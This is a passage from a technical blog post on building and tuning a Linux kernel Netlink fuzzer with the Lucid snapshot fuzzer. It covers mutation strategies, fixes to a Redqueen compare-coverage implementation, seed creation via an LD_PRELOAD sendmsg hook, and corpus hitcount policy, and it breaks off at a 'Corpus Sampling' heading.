You can see that we fuzzed the harness with this iteration of the mutator for almost a full day on my development VM. It surprisingly captured quite a few edges, around 17k. We can also see that we were able to process a lot of iterations, roughly 88 million during that time period. Globally across all 8 fuzzers we were sitting at about 200 iterations/sec when the last stats banner printed. Relative to subsequent versions of the mutator, this is quite a bit of throughput. This is because, like we discussed, most inputs simply didn’t pass initial parsing and so they returned early; in other words, our mutator created a ton of junk that didn’t do anything worthwhile. So while the throughput looks good on paper, it’s actually not good for us. We can also tell this by the relatively high share of CPU time we spend in reset: almost 7% of our time goes to performing snapshot resets.

It should be noted before we get much further comparing results across different iterations of the fuzzer that these results are likely not very meaningful. We can possibly deduce large picture conclusions like: it’s better to send inputs that have a sane nlmsg_len, but the results are likely too random to glean much else when we aren’t making 10x improvements. So keep that in mind, we aren’t doing a proper experiment here. I make a change to the fuzzer, run it for a day or so, check results, compare, repeat. With how low our throughput is (Lucid is very slow), and how limited our fuzzing time is, we can’t produce high-quality statistics.

It should also be noted that when I tweeted about fuzzing with Lucid using this mutator, I mentioned that the fuzzer did find an edge case OOB read bug, but it was artificial in that upstream sanity checks that our harness skips would prevent it from happening. So I’m not counting it as Lucid’s first 0day.

Stage 2 Fuzzing: More Mutation Strategies

The next step is to flesh out the mutator a little more. For the next step, I added several new mutation methods that would enable us to increase our efficiency (not send so much garbage) and also create inputs that would’ve previously been pretty impossible.

I added the following mutation strategies:

UniProtocol: Make every message in the input target the same protocol
DuplicateMessage: Duplicate one of the messages in the input
ShuffleMessages: Randomly shuffle the order of the messages in the input
SpliceMessage: Steal a message from another input and splice it into the current input
PatchHeaderLen: Determine what the correct nlmsghdr->nlmsg_len value should be and patch it
PatchHeaderType: Somewhat intelligently, put message type values in place of nlmsghdr->nlmsg_type for the subsystems we’re targeting
PatchHeaderFlags: Randomly create somewhat logically sane nlmsghdr->nlmsg_flags values
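
Two of these strategies are simple enough to sketch outside of Lucid. This is an approximation in Python, not the Rust implementation: it assumes each message holds a single nlmsghdr at offset 0 (a buffer holding several Netlink messages back to back would need each header patched separately), and the function names are hypothetical.

```python
import random
import struct

NLMSG_HDRLEN = 16   # sizeof(struct nlmsghdr)
MAX_MSGS = 16       # per-input message cap from the harness description

def patch_header_len(msg: bytes) -> bytes:
    """PatchHeaderLen-style fix-up: set nlmsg_len to the real buffer length."""
    if len(msg) < NLMSG_HDRLEN:
        return msg  # too short to contain a header, leave it alone
    return struct.pack("<I", len(msg)) + msg[4:]

def duplicate_message(msgs, rng: random.Random):
    """DuplicateMessage-style step: copy one message right after the original."""
    msgs = list(msgs)
    if not msgs or len(msgs) >= MAX_MSGS:
        return msgs
    i = rng.randrange(len(msgs))
    return msgs[:i + 1] + [msgs[i]] + msgs[i + 1:]

broken = b"\xff\xff\xff\xff" + b"\x00" * 16
fixed = patch_header_len(broken)
print(struct.unpack_from("<I", fixed)[0], len(duplicate_message([fixed], random.Random(0))))
```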

This step helped us quite a bit, it basically improved our efficiency by 2x:

[lucid stats (start time: 2025-09-20 16:24:38)]
globals: uptime: 0d 14h 8m 35s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 2.821M | iters/s: 31.18 | iters/s/f: 3.90
cpu: target: 97.4% | reset: 2.4% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 17740 | last find: 1h 4m 52s | map: 27.07%
snapshot: dirty pages: 7455 | dirty / total: 0.00132% | reset memcpys: 648
corpus: inputs: 313510 | corpus size (MB): 3779.988 | max input: 0x8088

As you can see, we were able to capture more edges in roughly two-thirds of the wall-clock time (about 14 hours versus 22). In terms of iterations, we captured more edges in roughly 30x fewer iterations (2.821M versus 88.266M). So this is a pretty massive efficiency boost. I think most of this comes from having sane nlmsghdr->nlmsg_len values being saved to the corpus as well as the mutation strategies that allow us to create more complex inputs.
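
The comparison can be worked out directly from the two stats banners. This is just back-of-the-envelope arithmetic on the numbers printed above, with the same caveat as the rest of this section that single runs are noisy; the variable names are arbitrary.

```python
def uptime_seconds(days: int, hours: int, minutes: int, seconds: int) -> int:
    return ((days * 24 + hours) * 60 + minutes) * 60 + seconds

# Numbers copied from the Stage 1 and Stage 2 stats banners.
stage1 = {"secs": uptime_seconds(0, 22, 26, 28), "iters": 88.266e6, "edges": 16917}
stage2 = {"secs": uptime_seconds(0, 14, 8, 35), "iters": 2.821e6, "edges": 17740}

iter_ratio = stage1["iters"] / stage2["iters"]
time_ratio = stage2["secs"] / stage1["secs"]
edges_per_miter_1 = stage1["edges"] / (stage1["iters"] / 1e6)
edges_per_miter_2 = stage2["edges"] / (stage2["iters"] / 1e6)

print(f"stage 1 used {iter_ratio:.1f}x the iterations of stage 2")
print(f"stage 2 ran for {time_ratio:.0%} of stage 1's wall-clock time")
print(f"edges per million iterations: {edges_per_miter_1:.0f} vs {edges_per_miter_2:.0f}")
```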

Previously if we were able to randomly generate a message that achieved quite a bit of code coverage, we were kind of limited in that we would have had to get extremely lucky to have another message in the same input randomly become similarly successful via dumb byte flipping. Instead now, we have new strategies like message duplication, message splicing, and unifying protocols so that each message has a chance to be sent to the same subsystem etc, and we can achieve deeper code coverage because our messages can now build off of previous messages in the same input.

Because our inputs had such a dramatically higher chance of passing initial parser checks now, our throughput has plummeted to around 2-4 iterations/sec/fuzzer. I have to admit this was shockingly lower than I expected for the fuzzer. I know Bochs emulation is a considerable slow down from native execution, somewhere around 100x I believe, but I hadn’t really seen it yet because up to this point we had only fuzzed toy targets for fuzzer development. This is why people say not to optimize too early, we had no idea that our Bochs emulation bottleneck was so pronounced and we could’ve spent so much time micro-optimizing core fuzzer code and it wouldn’t have made a difference at all.

Stage 3: Adding Compare Coverage with Redqueen

To this point, we hadn’t been using Lucid’s built-in Redqueen tooling. For those that are unaware, Redqueen is the name of a fuzzing paper by the geniuses at Ruhr University Bochum that tackles the problem of solving comparisons in fuzzing.

Oftentimes in fuzzing, the target will want to compare values derived from your input to values that it knows should/could exist. For instance, the following may exist semantically in a fuzzing target:

if (*(uint32_t *)(&fuzzing_input[0x1337]) == 0xdeadbeef) {
  buggy_function();
}

In this example, the target is checking our input for the presence of a magic value, in this case 0xdeadbeef. A lot of the time, these simple magic byte value checks represent a huge roadblock in automated fuzzing with no human in the loop. Using our dumb byte flipping mutations, we would have to successively target the 4 consecutive bytes and also randomly make them all the right value. This can be basically impossible in a lot of circumstances.

Redqueen’s contribution is that these types of checks often boil down to cmp instructions on x86 architectures, where two “operand values” are compared with one another, these being the left operand and the right operand. Now from the point of view of determining which side is derived from the input and which side is derived from the program, it is often impossible to make this distinction. So what Redqueen does is it searches the input for both operands, if it finds one of the operands, it replaces it in the input with the other operand value, hoping that we can now pass the check.
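
The core substitution step can be sketched in a few lines. This is a simplified illustration of the idea as described here, not Lucid's implementation and not the full technique from the paper: it only tries plain little-endian and big-endian encodings of each operand, and the function name redqueen_candidates is made up.

```python
def redqueen_candidates(data: bytes, lhs: int, rhs: int, size: int):
    """Yield inputs where one observed compare operand is swapped for the other."""
    seen = set()
    # We cannot tell which side came from the input, so try both directions.
    for find, repl in ((lhs, rhs), (rhs, lhs)):
        for order in ("little", "big"):
            needle = find.to_bytes(size, order)
            patch = repl.to_bytes(size, order)
            start = data.find(needle)
            while start != -1:
                cand = data[:start] + patch + data[start + size:]
                if cand != data and cand not in seen:
                    seen.add(cand)
                    yield cand
                start = data.find(needle, start + 1)

# The input currently holds 0x11223344 where the target wants 0xdeadbeef.
data = b"AAAA" + (0x11223344).to_bytes(4, "little") + b"BBBB"
for cand in redqueen_candidates(data, 0x11223344, 0xDEADBEEF, 4):
    print(cand.hex())
```

Each candidate is then run like any other input; if it produces new coverage, the compare has effectively been solved without having to guess the magic bytes.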

This would be extremely expensive normally during fuzzing, so to minimize overhead, Redqueen only performs this type of mutation on inputs that recently found new code coverage, this way the overhead is mostly a one-time cost and the overhead asymptotes to zero as the campaign progresses and new coverage becomes ever more rare.

This isn’t really a fair overview of the technique, but this conveys the gist. Please read the linked paper if you’re interested, it’s probably my favorite fuzzing paper to date.

We can implement this in our fuzzer because we have access to all compare instructions of all sizes for free in Bochs. The shared execution context data structure between Lucid and Bochs has a field called the “CPU mode” that tells Bochs what kind of emulation we’re doing. Once we find a new input, I replay the input with the CPU mode set to Cmplog. This causes Bochs to report all of the operand values that it sees in the compare instructions, the instruction pointer value, and the size of the operands back to Lucid. Lucid can then build a database of values and try the Redqueen strategy for more coverage.

However, we ran into a huge problem, check out the statistics from the Redqueen enabled run:

[lucid stats (start time: 2025-09-21 20:13:29)]
globals: uptime: 0d 14h 18m 23s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 369.79K | iters/s: 0.10 | iters/s/f: 0.01
cpu: target: 9.1% | reset: 0.0% | mutator: 0.0% | coverage: 0.0% | redqueen: 90.9% | misc: 0.0%
coverage: edges: 15829 | last find: 0h 17m 16s | map: 24.15%
snapshot: dirty pages: 7224 | dirty / total: 0.00128% | reset memcpys: 532
corpus: inputs: 32272 | corpus size (MB): 430.671 | max input: 0x8088

We were basically only doing Redqueen analysis for the entire 14-hour fuzzing run, during which we averaged roughly 7 iterations per second globally. This means that Redqueen had become a prohibitive bottleneck. And we can tell by the number of edges we discovered that it didn’t help much, at least not initially. This general pattern can be expected:

Early in the campaign we find new coverage often
Inputs are being sent to Redqueen often

That is not surprising. However, I found that there were several problems with the Redqueen implementation itself.

Issue-1

The Redqueen paper also pointed out that sometimes input data is transformed or encoded before being compared. For instance, maybe input data is originally a u64 value but is cast as an i32 before being compared. If that were the case, we would never find the compare operand value for the i32 in our input, so we would instead need to precompute a handful of common encodings and instead search for them. If we found the compare operand -> encoding value, we’d then replace it with the same encoding of the other operand value. This makes sense. However, I had a logic bug in my implementation that attempted to solve the compare by generating all possible encodings for the found operand value instead of the single matching encoding. This increased the number of input patches to try by 15-20x.

The Redqueen paper also discovered that substituting the operand value but doing arithmetic to -1 or +1 the value was helpful in passing less/greater than comparisons. Remember we only hook compare operations that might set CPU flags and we don’t know what the program does with that information afterwards so this helps us bypass those checks as well. So in my erroneous implementation, that will 3x the number of patches we attempt which was already 15-20x too many, so that’s now around 45-60x too many patches to test.

So here’s a concrete example of what I was doing:

I receive a report of an operand value pair 0x1337 and 0xdead. These are 2 byte values.
I was pre-computing every possible encoding for both values in the pair (this part is correct)
If I found an encoding variant of 0x1337, say zero-extended to a u32, so 0x00001337 in the input, what I should be doing is applying that same encoding scheme to its partner value and creating 0x0000dead. Then I would replace 0x00001337 in the input with 0x0000dead.
Instead, I was replacing 0x00001337 with every possible similarly sized encoding of 0xdead
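The corrected behavior from the example above can be sketched as follows. This is an illustration under my own assumptions: the encoding list is a small made-up subset, and the names encodings and matched_patches are hypothetical rather than anything from Lucid.

```python
def encodings(value: int, size: int) -> dict:
    """Return a few encodings of `value`, keyed by a scheme name.
    The scheme list is illustrative, not the set Lucid uses."""
    out = {
        "le": value.to_bytes(size, "little"),
        "be": value.to_bytes(size, "big"),
    }
    # Zero-extend to wider widths, in both byte orders.
    for wide in (4, 8):
        if wide > size:
            out[f"zext{wide}_le"] = value.to_bytes(wide, "little")
            out[f"zext{wide}_be"] = value.to_bytes(wide, "big")
    return out


def matched_patches(data: bytes, found: int, partner: int, size: int):
    """For each encoding of `found` present in `data`, substitute the
    SAME encoding of `partner`: one patch per hit, not one per encoding."""
    partner_enc = encodings(partner, size)
    patches = []
    for scheme, needle in encodings(found, size).items():
        pos = data.find(needle)
        if pos == -1:
            continue
        patched = data[:pos] + partner_enc[scheme] + data[pos + len(needle):]
        if patched not in patches:   # narrow and wide hits can coincide
            patches.append(patched)
    return patches


# 0x1337 appears zero-extended to a big-endian u32: 00 00 13 37
data = b"\xff\xff" + bytes.fromhex("00001337") + b"\xff\xff"
patches = matched_patches(data, 0x1337, 0xDEAD, 2)
```

The buggy version would instead have emitted one patch for every entry in partner_enc for each hit, which is where the 15-20x blowup came from.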

Issue-2

But wait, it gets worse! I was also not deduplicating operands based on the RIP value of the cmp instruction. Now normally, this can be ok because it allows you to potentially pass more dynamic comparisons where maybe both operand values are everchanging based on your input, say a checksum for example. However, with our throughput issues, and just wanting to do the bare-minimum here and defeat classic magic number comparisons, we can whittle down the number of input patches to try significantly by ignoring operands collected from RIP values we’ve already collected. We will rely on human-in-the-loop intervention if we ever need to defeat checksum type comparisons.
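A minimal sketch of that deduplication, assuming each compare report is a (rip, lhs, rhs, size) tuple (a hypothetical layout standing in for whatever Bochs actually reports):

```python
def dedupe_by_rip(reports, seen_rips: set):
    """Keep only the first report for each cmp instruction address.

    `seen_rips` persists across inputs, so a compare site is analysed
    at most once per campaign.
    """
    fresh = []
    for rip, lhs, rhs, size in reports:
        if rip in seen_rips:
            continue  # already analysed a compare at this address
        seen_rips.add(rip)
        fresh.append((rip, lhs, rhs, size))
    return fresh


seen = set()
first = dedupe_by_rip(
    [(0x1000, 1, 2, 4), (0x1000, 3, 4, 4), (0x2000, 5, 6, 4)], seen
)
second = dedupe_by_rip([(0x1000, 7, 8, 4), (0x3000, 9, 10, 4)], seen)
```

The tradeoff is the one described above: a checksum-style compare at 0x1000 with fresh operands on every run would only ever be attempted once.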

Issue-3

To cap everything off, I was creating all of the patched inputs before trying them all serially. So I would pre-compute the patched inputs and stuff them in an input queue that Lucid would then prioritize over normal mutations. This led to my fuzzers being SIGKILLed by the kernel as they started holding too many inputs in memory overnight. That is actually what ended this stage of experimentation. So this fuzzing stage was an abject disaster, and we ended up making a ton of improvements in the next iteration.

Issue-4

Minor Note: The Redqueen paper also employed a technique it called “colorization” wherein the input would be “colored” with random bytes up until the coloring changed the execution path of the input. So it would overwrite input data with random bytes and check to see if that affected the execution path. It started with the largest amount of randomization possible and then, using something like binary search, would continue to shrink the portions of the input that would be colorized until its execution trace matched the original. The purpose of this is to make finding operand values in the input easier. Instead of an input being full of 0x0 values for instance, it now contains random data and when you capture the compare operand values, that random data in the capture is easier to spot in the input and you don’t run the risk of duplicating candidate insertions. This is actually genius. Lucid has this feature too, but I found that I was spending dozens of seconds colorizing large inputs. This is because we simply are so slow. I decided that the juice wasn’t worth the squeeze and made it such that in order to use colorization now, you have to pass a command line flag to opt into it.
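To make the colorization idea concrete, here is a simplified sketch of the range-splitting search. It is neither the paper’s exact algorithm nor Lucid’s implementation: the trace callable is a hypothetical stand-in for running the target and summarizing its execution path, and max_runs is an arbitrary budget I added.

```python
import random


def colorize(data: bytes, trace, rng: random.Random, max_runs: int = 64) -> bytes:
    """Randomize as much of `data` as possible without changing `trace(data)`."""
    baseline = trace(data)
    current = bytearray(data)
    ranges = [(0, len(data))]            # half-open byte ranges left to try
    runs = 0
    while ranges and runs < max_runs:
        ranges.sort(key=lambda r: r[1] - r[0])
        start, end = ranges.pop()        # largest remaining range first
        if end == start:
            continue
        saved = current[start:end]
        current[start:end] = bytes(rng.getrandbits(8) for _ in range(end - start))
        runs += 1
        if trace(bytes(current)) != baseline:
            current[start:end] = saved   # revert, then retry on the halves
            if end - start > 1:
                mid = (start + end) // 2
                ranges += [(start, mid), (mid, end)]
    return bytes(current)


def toy_trace(buf: bytes) -> bool:
    """Toy target: the execution path depends only on a 4-byte magic."""
    return buf[:4] == b"MAGI"


seed = b"MAGI" + bytes(28)
colored = colorize(seed, toy_trace, random.Random(1234))
```

Every attempt costs one full execution of the target, which is why this gets expensive quickly when each execution is slow.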

Stage 4: Fixing Redqueen

Besides fixing the aforementioned logical errors, I added some new logic to the implementation. First, I started deduping operand values collected by the RIP value. So we no longer are doing Redqueen analysis for the same RIP compare operands more than once.

Additionally, I stopped collecting compare operands for values that weren’t at least 4 bytes in size. I figure that most mutators should be able to randomly pass 1 and 2-byte comparisons by sheer luck.

I also capped the number of Redqueen inputs you can put in the fuzzer’s test queue at 500. In my testing, we never even really approached 500 inputs in the test queue with the fixed encoding search, deduping RIP, and removing < 4-byte compares. Previously, in the broken implementation, some fuzzers were carrying up to 1 million inputs to test!
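A rough sketch of the operand-size filter and the queue cap together. The constant and function names are made up, and dropping the overflow once the cap is hit is my assumption; the post does not say what Lucid does in that case.

```python
from collections import deque

MIN_OPERAND_SIZE = 4   # bytes; smaller compares are left to the mutator
MAX_QUEUE_LEN = 500    # cap on pending Redqueen inputs


def enqueue_patches(queue: deque, operand_size: int, patches) -> int:
    """Add patched inputs to `queue`, honouring the size filter and cap.
    Returns how many inputs were actually queued."""
    if operand_size < MIN_OPERAND_SIZE:
        return 0
    added = 0
    for patch in patches:
        if len(queue) >= MAX_QUEUE_LEN:
            break  # drop the rest rather than grow without bound
        queue.append(patch)
        added += 1
    return added


queue = deque()
skipped = enqueue_patches(queue, 2, [b"a", b"b"])
queued = enqueue_patches(queue, 4, (bytes([i % 256]) for i in range(1000)))
```

Passing the patches as a generator means nothing past the cap is ever materialized in memory.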

Fixing the bugs and adding these new restrictions to the Redqueen code helped immensely and we achieved the following fuzzing run:

[lucid stats (start time: 2025-09-22 11:47:27)]
globals: uptime: 0d 5h 49m 26s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 738.01K | iters/s: 34.30 | iters/s/f: 4.29
cpu: target: 98.1% | reset: 1.8% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16100 | last find: 0h 1m 10s | map: 24.57%
snapshot: dirty pages: 7290 | dirty / total: 0.00129% | reset memcpys: 557
corpus: inputs: 70366 | corpus size (MB): 877.591 | max input: 0x8088

As you can see, we completed twice as many iterations in less than half of the wall-clock time. We also didn’t use so much memory that the fuzzers got killed, so that’s good. Now that Redqueen is fixed, we can move on.

Redqueen Success Example

Redqueen proved to be extremely helpful at finding new edges once we got away from the first 30 minutes or so of fuzzing. This was an awesome example I have to share:

[lucid stats (start time: 2025-09-24 15:23:35)]
globals: uptime: 0d 0h 56m 54s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 96.08K | iters/s: 18.05 | iters/s/f: 2.26
cpu: target: 97.7% | reset: 1.4% | mutator: 0.0% | coverage: 0.0% | redqueen: 0.7% | misc: 0.0%
coverage: edges: 19920 | last find: 0h 0m 56s | map: 30.40%
snapshot: dirty pages: 8122 | dirty / total: 0.00144% | reset memcpys: 982
corpus: inputs: 2581 | corpus size (MB): 8.827 | max input: 0x10088
fuzzer-2: Fuzzing increased edge count 19475 -> 19476 (+1)
fuzzer-1: Fuzzing increased edge count 19505 -> 19507 (+2)
fuzzer-7: Fuzzing increased edge count 19194 -> 19196 (+2)
fuzzer-4: Fuzzing increased edge count 19365 -> 19370 (+5)
fuzzer-4: Redqueen increased edge count 19370 -> 19721 (+351)
fuzzer-4: Redqueen increased edge count 19721 -> 19784 (+63)
fuzzer-4: Redqueen increased edge count 19784 -> 20925 (+1141)

fuzzer-4 starts off well behind the record edge count (19920) at 19365 edges discovered. It uses normal fuzzing mutation strategies and increases its edge count to 19370. Then, that new-edge-finding input is sent to Redqueen for processing and Redqueen dramatically increases the fuzzer’s edge discovery progress. It rapidly discovers 1555 new edges which is an 8% increase over what it had just reached with fuzzing.

Stage 5: Adding Seeds, Mutator Tweaks, Misc.

Seeds

In this stage, the focus was mainly on creating seed inputs that would start the fuzzing campaign off with a lot of coverage. Up to this point, the most edges we ever discovered for this fuzzing target/harness was around 17.5k, which we saw with our improved mutator but without compare coverage and running for around 14 hours. Now, that doesn’t mean that compare coverage is a hindrance to edge discovery, it just means that early on it’s not as effective at finding new edges as the normal fuzzing strategies were. With seeds, I was hoping to see a dramatic increase in the number of edges discovered because we’d be spoon feeding the mutator some of the complex inputs it needs to generate.

To create seed inputs, I created an LD_PRELOAD shared object that hijacked the sendmsg libc invocation found in several command line utilities that normally come packaged in Ubuntu to interact with these subsystems. I’m talking about tc for setting up qdiscs or the network scheduler for NETLINK_ROUTE, or nft to interact with nf_tables for NETLINK_NETFILTER, etc. I simply hook the sendmsg libc function and have it dump the message contents to the terminal in hex. Here is an example:

root@luciddev:/home/h0mbre/netlink_fuzzing# LD_PRELOAD=./hexdump_netlink.so tc qdisc add dev dummy0 root pfifo_fast
echo "3400000024000506fa2cd46800000000000000000700000000000000ffffffff000000000f000100706669666f5f666173740000"
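To sanity check a dump like this, the leading bytes can be decoded as a Netlink message. The sketch below is mine and not part of the seed tooling; it assumes the standard little-endian struct nlmsghdr layout followed by a 20-byte struct tcmsg, and the variable names are made up for illustration.

```python
import struct

# The hex string printed by the hook in the example above.
dump = bytes.fromhex(
    "3400000024000506fa2cd46800000000000000000700000000000000ffffffff000000000f000100706669666f5f666173740000"
)

# struct nlmsghdr: u32 len, u16 type, u16 flags, u32 seq, u32 pid
nl_len, nl_type, nl_flags, nl_seq, nl_pid = struct.unpack_from("<IHHII", dump, 0)

# struct tcmsg: u8 family, 3 pad bytes, s32 ifindex, u32 handle, u32 parent, u32 info
family, ifindex, handle, parent, info = struct.unpack_from("<B3xiIII", dump, 16)

# The first attribute follows the 16-byte nlmsghdr and the 20-byte tcmsg.
attr_len, attr_type = struct.unpack_from("<HH", dump, 36)
kind = dump[40:36 + attr_len].rstrip(b"\x00").decode()

print(nl_len, nl_type, hex(nl_flags), ifindex, hex(parent), attr_type, kind)
```

The header length matches the size of the dump, type 36 is RTM_NEWQDISC, the parent 0xffffffff is the root handle, and the first attribute (type 1, TCA_KIND) carries the qdisc name pfifo_fast from the tc command line.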

Then I just pasted that echo string into the terminal and wrote the hex to a file and then wrapped those bytes in our fuzzing input data structure using Python:

#!/usr/bin/env python3
import sys

# lf_protocols = {0: ROUTE, 1: XFRM, 2: NETFILTER, 3: CRYPTO}

def build_seed(hex_string: str, protocol: int, out_file: str):
    # Parse hex string into bytes
    payload = bytes.fromhex(hex_string)
    payload_len = len(payload)

    # Lengths
    lf_msg_hdr_len = 8
    lf_input_hdr_len = 8
    total_len = payload_len + lf_msg_hdr_len + lf_input_hdr_len
    num_msgs = 1

    # Build buffer
    buf  = total_len.to_bytes(4, "little")
    buf += num_msgs.to_bytes(4, "little")
    buf += protocol.to_bytes(4, "little")
    buf += payload_len.to_bytes(4, "little")
    buf += payload

    # Write to disk
    with open(out_file, "wb") as f:
        f.write(buf)

    print(f"Wrote {out_file} ({len(buf)} bytes, payload={payload_len} bytes)")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <hex_file> <protocol> <out_file>")
        sys.exit(1)

    hex_file, protocol_str, out_file = sys.argv[1:]
    protocol = int(protocol_str)

    with open(hex_file, "r") as f:
        # join lines, strip whitespace/newlines
        hex_string = "".join(line.strip() for line in f)

    build_seed(hex_string, protocol, out_file)

I think all in all I created ~30 seeds this way. I seeded each target protocol with at least 1 seed besides NETLINK_CRYPTO. The vast majority of the seeds became single message inputs and were simple in nature. For nf_tables specifically, I did create one input that was a series of messages to do stateful things like: create a table, then create a set, then create an object, etc.

When fuzzing with seeds, our coverage increased dramatically. The seeds alone found over 17k edges. The lesson learned is nothing new, but having good seeds dramatically enhances your fuzzing efficiency.

Mutator Tweaks

Since we’re so limited on throughput, I really wanted to make sure the inputs we were creating weren’t wasting cycles. On average we were spending over 98% of our CPU time executing the target and spending roughly 2% of the time doing snapshot resets. At that much target time, it’s clear where the bottleneck is and it’s not on anything the fuzzer itself is doing.

This kind of frees us up to do more things in the fuzzer since it won’t slow the process down at all really. So what I decided to do was start hashing every input that the mutator created and comparing it to a database of the last n inputs, which I set arbitrarily at 500_000. So now, every input we create is guaranteed to not be a repeat of the last 500k inputs. This helps a little when it comes to throughput because we’re not wasting precious CPU time re-running an often seen input.
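One way to build such a “last n inputs” database is a set for lookups plus a queue for eviction order. This is a sketch under my own assumptions (the class name, the choice of BLAKE2b, and the 8-byte digest are all made up), not how Lucid does it:

```python
import hashlib
from collections import deque


class RecentInputs:
    """Remember hashes of the last `capacity` inputs and reject repeats."""

    def __init__(self, capacity: int = 500_000):
        self.capacity = capacity
        self.order = deque()   # hashes, oldest first
        self.seen = set()      # same hashes, for O(1) lookup

    def is_new(self, data: bytes) -> bool:
        digest = hashlib.blake2b(data, digest_size=8).digest()
        if digest in self.seen:
            return False
        if len(self.order) == self.capacity:
            self.seen.discard(self.order.popleft())  # evict the oldest
        self.order.append(digest)
        self.seen.add(digest)
        return True


recent = RecentInputs(capacity=2)
results = [recent.is_new(x) for x in (b"a", b"b", b"a", b"c", b"a")]
```

With a short digest, a hash collision can occasionally reject an input that was never actually seen, which is harmless here since the mutator just generates another one.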

I also made sure that when the mutator was choosing mutation strategies that it would no longer accept a NOP operation in place of an applied mutation. As an example, say we get an input from the corpus to mutate and that input is already the maximum size. Previously, if we were to randomly select the ByteInsert mutation method for this input it would effectively perform a NOP and return without doing anything. This is potentially a waste of input creation cycles. So I changed the function signature of the mutation strategies to return a bool where true meant the mutation was successfully applied and false meant that it was not. This way we can make sure at least some mutation is applied to each and every input.
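The bool-returning pattern can be sketched like this. The two strategies, the tiny size limit, and the retry loop are illustrative assumptions of mine, not Lucid’s mutator:

```python
import random

MAX_INPUT_SIZE = 8  # tiny limit so the example is easy to follow


def byte_insert(buf: bytearray, rng: random.Random) -> bool:
    """Insert one random byte; report False if the input is already full."""
    if len(buf) >= MAX_INPUT_SIZE:
        return False
    buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    return True


def byte_flip(buf: bytearray, rng: random.Random) -> bool:
    """Invert one byte; report False on an empty input."""
    if not buf:
        return False
    idx = rng.randrange(len(buf))
    buf[idx] ^= 0xFF
    return True


def mutate(buf: bytearray, rng: random.Random, strategies) -> None:
    """Keep picking strategies until one reports that it changed the input."""
    while not rng.choice(strategies)(buf, rng):
        pass


rng = random.Random(7)
full = bytearray(b"ABCDEFGH")        # already at MAX_INPUT_SIZE
before = bytes(full)
mutate(full, rng, [byte_insert, byte_flip])
```

A real implementation would want a retry limit, since this loop never terminates if no strategy in the list can apply to the input.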

Lastly, I keep a constant defined in the netlink mutator that is supposed to represent the percentage of inputs that we generate from scratch. It had previously been set at 5% and I lowered it to 1% now that we have seeds. I figured this would stop us from sending so much garbage while still allowing us to do something very random that still reaches some never before reached error handling paths. In addition to the rate change, I also refactored the random generation function to produce Netlink message-like inputs instead of random blobs of data of varying lengths. Now when we generate messages from scratch, they are at least shaped like valid Netlink messages.

Hitcount Change

Some of the previous runs had absolutely exploded the corpus size, for instance in Stage 2 we had accumulated over 300k inputs in the corpus. I wanted to try and cut down on this bloat where possible because my intuition was that we were saving too many inputs. By default, Lucid would save an input if it discovered what it considered a new edge pair, e.g. a new basic block transition, and it would also save an input if it reached an edge pair a record number of times, called a hitcount. I bucket the hitcounts like AFL++ does:

    /// After a fuzzing iteration, Bochs will have updated the curr_map with
    /// hit counts for each edge pair that was reached during that fuzzing
    /// iteration. Instead of keeping the hit counts literal, we instead "bucket"
    /// the hit counts into categories. So for instance if we hit an edge pair
    /// 19 times, it will be placed in the 32 hitcount bucket. This algorithm
    /// is stolen directly from AFL++ who obviously has a ton of empirical
    /// evidence showing that this is beneficial
    #[inline(always)]
    fn bucket(hitcount: u8) -> u8 {
        match hitcount {
            0 => 0,
            1 => 1,
            2 => 2,
            3 => 4,
            4..=7 => 8,
            8..=15 => 16,
            16..=31 => 32,
            32..=127 => 64,
            128..=255 => 128,
        }
    }

So, if we move from a hitcount record on an edge pair of 4 and an input achieves a hitcount of 5, we don’t save it. But if the second input were to achieve a hitcount of 8, placing it in a new bucket, it would get saved. The ratio of these hitcount record setting inputs to edge pair discovery inputs was easily more than 10 to 1 and I felt like, especially early in the campaign, they were kind of just noise and not extremely helpful.
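The save decision in that example can be checked with a small Python port of the bucketing function. The helper is_hitcount_record is a name I made up for illustration:

```python
def bucket(hitcount: int) -> int:
    """Python port of the Rust bucketing function shown above."""
    if hitcount <= 2:
        return hitcount
    if hitcount == 3:
        return 4
    if hitcount <= 7:
        return 8
    if hitcount <= 15:
        return 16
    if hitcount <= 31:
        return 32
    if hitcount <= 127:
        return 64
    return 128


def is_hitcount_record(best_bucket: int, hitcount: int) -> bool:
    """True only if this hit count lands in a higher bucket than the record."""
    return bucket(hitcount) > best_bucket


record = bucket(4)   # current record for this edge pair
saves = [is_hitcount_record(record, n) for n in (5, 7, 8)]
```

Hit counts of 5 and 7 stay in the same bucket as 4, so only the input that reaches 8 sets a new record.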

What I moved to was a model where I only considered new hitcount records if we were “starved” for new coverage. I created a command line option to set a “starved for coverage” threshold in wall-clock time, so once you go that long without new coverage, the fuzzer starts saving hitcount record inputs to the corpus. During our longest fuzzing campaign, we reached the one-hour starved threshold multiple times, and saving these types of inputs seemed beneficial at that point, as they soon after found new coverage.
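A minimal sketch of that gating logic, assuming the threshold is measured from the last new-edge find. The class and method names are hypothetical, and the clock is injectable only so the example can be stepped by hand:

```python
import time


class HitcountPolicy:
    """Decide whether hitcount-record inputs may be saved to the corpus."""

    def __init__(self, starved_after_secs: float, now=time.monotonic):
        self.starved_after_secs = starved_after_secs
        self.now = now
        self.last_new_edge = now()

    def starved(self) -> bool:
        return self.now() - self.last_new_edge >= self.starved_after_secs

    def should_save(self, new_edge: bool, hitcount_record: bool) -> bool:
        if new_edge:
            self.last_new_edge = self.now()  # new coverage resets the timer
            return True
        return hitcount_record and self.starved()


clock = [0.0]
policy = HitcountPolicy(3600, now=lambda: clock[0])
early = policy.should_save(new_edge=False, hitcount_record=True)
clock[0] = 3600.0
late = policy.should_save(new_edge=False, hitcount_record=True)
clock[0] = 3700.0
found = policy.should_save(new_edge=True, hitcount_record=False)
after_find = policy.should_save(new_edge=False, hitcount_record=True)
```

New-edge inputs are always saved; hitcount records only count once the fuzzer has gone the full threshold without one.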

Corpus Sampling

